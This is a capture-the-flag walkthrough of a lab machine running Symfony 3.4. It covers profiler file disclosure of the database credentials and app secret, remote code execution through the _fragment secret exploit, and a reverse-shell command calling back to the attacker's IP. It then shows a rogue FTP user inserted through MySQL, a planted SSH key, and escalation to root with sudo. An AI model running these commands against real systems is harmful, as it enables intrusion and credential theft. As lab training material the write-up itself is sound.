Target IP: 192.168.156.233
Challenge Description: A fractal is a way of seeing infinity.
There are three TCP ports open on the target machine, as shown above.
Performing an aggressive port scan against the open TCP ports returns the result above. There is a HTTP application on port 80, and I will start enumeration here. The scan above found the interesting robots.txt which contains two entries: /app_dev.php and /app_dev.php/*.
Port 80: HTTP
The webpage above is displayed for this web application. At the bottom of the webpage, there is a comment Build with Symfony. I did not find anything else useful here.
Browsing to http://192.168.156.233/app_dev.php displays the webpage above. This page contains more information about the application & machine. The target machine seems to be running the application version 3.4.46 as shown above.
Pressing the application version button shows the application configuration above. Doing a Google search for public exploits lead me to this article.
I managed to obtain the profiler token bba391 to access the Symfony Profiler.
The database default configuration file location is app/config/parameters.yml. Using the profiler, I managed to read the database configuration file shown above at http://192.168.156.233/app_dev.php/_profiler/open?file=app/config/parameters.yml. Now I have the credentials symfony:symfony_db_password. I also obtained the secret 48a8538e6260789558f0dfe29861c05b. Doing a Google search shows it is possible to obtain an RCE using this secret according to this article.
I found a working exploit for this application as shown above. This exploit seems to take advantage of the _fragment to execute commands. I downloaded the first exploit, secret_fragment_exploit.py, as shown above.
I ran the exploit with the command python exploit.py http://192.168.156.233/_fragment --internal-url http://192.168.156.233/_fragment --secret '48a8538e6260789558f0dfe29861c05b' --method 2 --function system --parameters 'id with the command id.
This executed successfully as the output of id command is shown above. Maybe I can obtain a reverse shell now.
I started a listener on my machine at port 80. Then I used the command python exploit.py http://192.168.156.233/_fragment --internal-url http://192.168.156.233/_fragment --secret '48a8538e6260789558f0dfe29861c05b' --method 2 --function system --parameters "bash -c 'bash -i >& /dev/tcp/192.168.45.194/80 0>&1'" to obtain a reverse shell with the session as www-data. Now I have a foothold on the target machine.
I transferred Linpeas to the target machine. After executing this, I obtained the useful information above. Using the phpMyAdmin credentials I obtained above, I gained access to the application. However, I did not find anything useful.
From previous enumeration, the FTP application is open. There is an interesting file called sql.conf at /etc/proftpd. This file contains the credentials proftpd:protfpd_with_MYSQL_password as shown above. I upgraded my shell using the command python3 -c 'import pty; pty.spawn("/bin/bash");'.
Running ss -ntplu shows there is another application running on port 33060. Is this another MySQL application?
I then used the command mysql -u proftpd -p'protfpd_with_MYSQL_password' -P 33060 to access the MySQL application. There is an interesting table called ftpuser, as shown above. Maybe I can create a user with shell access? In the table above, the password field contains the string {md5}. Doing a Google search on how to create a password for ProFTPD gave me the command: echo "{md5}" 'echo -n "letmein" | openssl dgst -binary -md5 | openssl enc -base64'. I used the new password letmein.
Using the SQL statement below, I inserted the benoit user with /bin/bash shell access:
INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (2, 'benoit', '{md5}DRB9CfW75Ayt495ccenptw==', '1000', '1000', '/', '/bin/bash', '0', NOW(), NOW());INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (2, 'benoit', '{md5}DRB9CfW75Ayt495ccenptw==', '1000', '1000', '/', '/bin/bash', '0', NOW(), NOW());
Now I can access the FTP using the credentials benoit:letmein. Since the SSH key is missing for this user, I generated a SSH key using the command ssh-keygen. Then I transferred the id_rsa.pub to .ssh as authorized_keys. Then using the command ssh benoit@192.168.156.233 -i /home/kali/.ssh/id_rsa, I gained access to the SSH application as the user benoit. Now I have a foothold on the target machine as benoit. Running sudo -l shows all commands can be executed. Then gaining a root shell is as easy as entering sudo bash. GG.
The local.txt flag is shown above. This flag is located at the home directory of user benoit.
The proof.txt flag is shown above.